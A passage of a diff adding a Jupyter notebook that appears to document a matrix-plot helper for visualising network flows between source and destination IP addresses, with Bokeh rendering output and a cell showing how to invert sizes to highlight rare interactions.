[\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2719\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"abc0d1cf-253b-45f4-8494-1173f4a07fcd\" data-root-id=\"2721\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"3be3ee9c-f301-4867-8aea-40e766d6dfc7\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"2732\"}],\"center\":[{\"id\":\"2734\"},{\"id\":\"2737\"}],\"height\":700,\"left\":[{\"id\":\"2735\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"2755\"}],\"title\":{\"id\":\"2722\"},\"toolbar\":{\"id\":\"2744\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"2724\"},\"x_scale\":{\"id\":\"2728\"},\"y_range\":{\"id\":\"2726\"},\"y_scale\":{\"id\":\"2730\"}},\"id\":\"2721\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"2733\",\"type\":\"CategoricalTicker\"},{\"attributes\":{},\"id\":\"2738\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"2758\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"2762\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{},\"id\":\"2728\",\"type\":\"CategoricalScale\"},{\"attributes\":{\"data\":{\"DestinationIP\":[\"40.77.228.69\",\"52.168.138.145\",\"13.71.172.130\",\"40.91.75.5\",\"40.124.45.19\",\"13.71.172.128\",\"172.217.15.99\",\"20.38.98.100\",\"104.43.212.12\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"65.55.44.109\",\"13.65.107.32\",\"40.124.45.19\",\"40.77.228.69\",\"52.165.170.112\",\"52.168.138.145\",\"72.21.81.200\",\"13.65.107.32\",\"40.124.45.19\",\"52.168.138.145\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"72.21.91.29\",\"72.21.81.200\",\"40.91.75.5\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.240\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"13.71.172.128\",\"40.77.232.95\",\"52.165.170.112\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.91.29\",\"52.168.138.145\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"23.48.36.78\",\"52.165.170.112\",\"65.55.44.109\",\"20.38.98.100\",\"8.249.241.254\",\"40.77.228.69\",\"172.217.15.99\",\"13.67.143.117\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.226.250\",\"52.239.152.10\",\"65.55.44.109\",\"90.130.70.73\",\"20.38.98.100\",\"65.55.44.109\",\"13.65.107.32\",\"13.67.143.117\",\"20.38.98.100\",\"13.67.143.117\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"20.38.98.100\",\"23.4.187.27\",\"40.124.45.19\",\"65.55.44.108\",\"72.21.81.200\",\"72.21.91.29\",\"99.84.104.63\",\"13.65.107.32\",\"40.124.45.19\",\"172.217.15.99\",\"8.249.241.254\",\"13.68.93.109\",\"40.77.228.69\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"157.55.134.136\"],\"SourceIP\":[\"10.0.3.5\",\"10.0.3.5\",\"104.43.212.12\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.65.107.32\",\"13.65.107.32\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.232.95\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.239.152.10\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.108\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.81.240\",\"72.21.91.29\",\"72.21.91.29\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"],\"TotalAllowedFlows\":[1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,3,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85],\"plt_size\":{\"__ndarray__\":\"q6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqhpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkAAAAAAAAAkQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqhpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqhpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqGkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqGkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoaQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkCrqqqqqqoKQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[86]},\"size\":[1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,3,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"2764\"},\"selection_policy\":{\"id\":\"2765\"}},\"id\":\"2720\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"2742\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"2736\",\"type\":\"CategoricalTicker\"},{\"attributes\":{},\"id\":\"2761\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis_label\":\"DestinationIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"2759\"},\"major_label_policy\":{\"id\":\"2758\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"9pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"2736\"}},\"id\":\"2735\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2743\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"factors\":[\"10.0.3.5\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"]},\"id\":\"2724\",\"type\":\"FactorRange\"},{\"attributes\":{\"source\":{\"id\":\"2720\"}},\"id\":\"2756\",\"type\":\"CDSView\"},{\"attributes\":{\"overlay\":{\"id\":\"2743\"}},\"id\":\"2739\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"2765\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis\":{\"id\":\"2732\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2734\",\"type\":\"Grid\"},{\"attributes\":{\"text\":\"External IP protocol flows (distinct protocols)\",\"text_font_size\":\"15pt\"},\"id\":\"2722\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"2759\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"red\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"2754\",\"type\":\"Circle\"},{\"attributes\":{\"axis\":{\"id\":\"2735\"},\"dimension\":1,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2737\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2740\",\"type\":\"PanTool\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"SourceIP\",\"@SourceIP\"],[\"DestinationIP\",\"@DestinationIP\"],[\"value\",\"@size\"]]},\"id\":\"2750\",\"type\":\"HoverTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"red\"},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"2753\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"2720\"},\"glyph\":{\"id\":\"2753\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2754\"},\"view\":{\"id\":\"2756\"}},\"id\":\"2755\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2738\"},{\"id\":\"2739\"},{\"id\":\"2740\"},{\"id\":\"2741\"},{\"id\":\"2742\"},{\"id\":\"2750\"}]},\"id\":\"2744\",\"type\":\"Toolbar\"},{\"attributes\":{\"axis_label\":\"SourceIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"2762\"},\"major_label_orientation\":1.5707963267948966,\"major_label_policy\":{\"id\":\"2761\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"9pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"2733\"}},\"id\":\"2732\",\"type\":\"CategoricalAxis\"},{\"attributes\":{},\"id\":\"2730\",\"type\":\"CategoricalScale\"},{\"attributes\":{\"factors\":[\"99.84.104.63\",\"90.130.70.73\",\"8.249.241.254\",\"72.21.91.29\",\"72.21.81.240\",\"72.21.81.200\",\"65.55.44.109\",\"65.55.44.108\",\"52.239.152.10\",\"52.168.138.145\",\"52.165.170.112\",\"40.91.75.5\",\"40.77.232.95\",\"40.77.228.69\",\"40.77.226.250\",\"40.124.45.19\",\"23.48.36.78\",\"23.4.187.27\",\"20.38.98.100\",\"172.217.15.99\",\"157.55.134.136\",\"13.83.148.218\",\"13.71.172.130\",\"13.71.172.128\",\"13.68.93.109\",\"13.67.143.117\",\"13.65.107.32\",\"104.43.212.12\"]},\"id\":\"2726\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"2741\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"2764\",\"type\":\"Selection\"}],\"root_ids\":[\"2721\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"3be3ee9c-f301-4867-8aea-40e766d6dfc7\",\"root_ids\":[\"2721\"],\"roots\":{\"2721\":\"abc0d1cf-253b-45f4-8494-1173f4a07fcd\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/plain": [
+       "Figure(id='2721', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'2721', <span id=\"2818\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[CategoricalAxis(id='2732', ...)],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='2734', ...), Grid(id='2737', ...)],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;700,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[CategoricalAxis(id='2735', ...)],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GlyphRenderer(id='2755', ...)],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='2722', ...),</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='2744', ...),</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'above',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;900,</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;FactorRange(id='2724', ...),</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;CategoricalScale(id='2728', ...),</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;FactorRange(id='2726', ...),</div></div><div class=\"2817\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;CategoricalScale(id='2730', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2818\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2817\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Inverting to show rare interactions as larger\r\n",
+    "\r\n",
+    "Where you want to highlight unusual interactions, we can plot the\r\n",
+    "inverse of the `value_col` value or count of interactions using the `invert=True` parameter.\r\n",
+    "\r\n",
+    "This results in a plot with larger circles for rarer interactions."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "source": [
+    "net_df.mp_plot.matrix(\r\n",
+    "    x=\"SourceIP\",\r\n",
+    "    y=\"DestinationIP\",\r\n",
+    "    value_col=\"TotalAllowedFlows\",\r\n",
+    "    title=\"External IP flows (rare flows == larger)\",\r\n",
+    "    invert=True,\r\n",
+    "    sort=\"asc\",\r\n",
+    ")"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2214\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
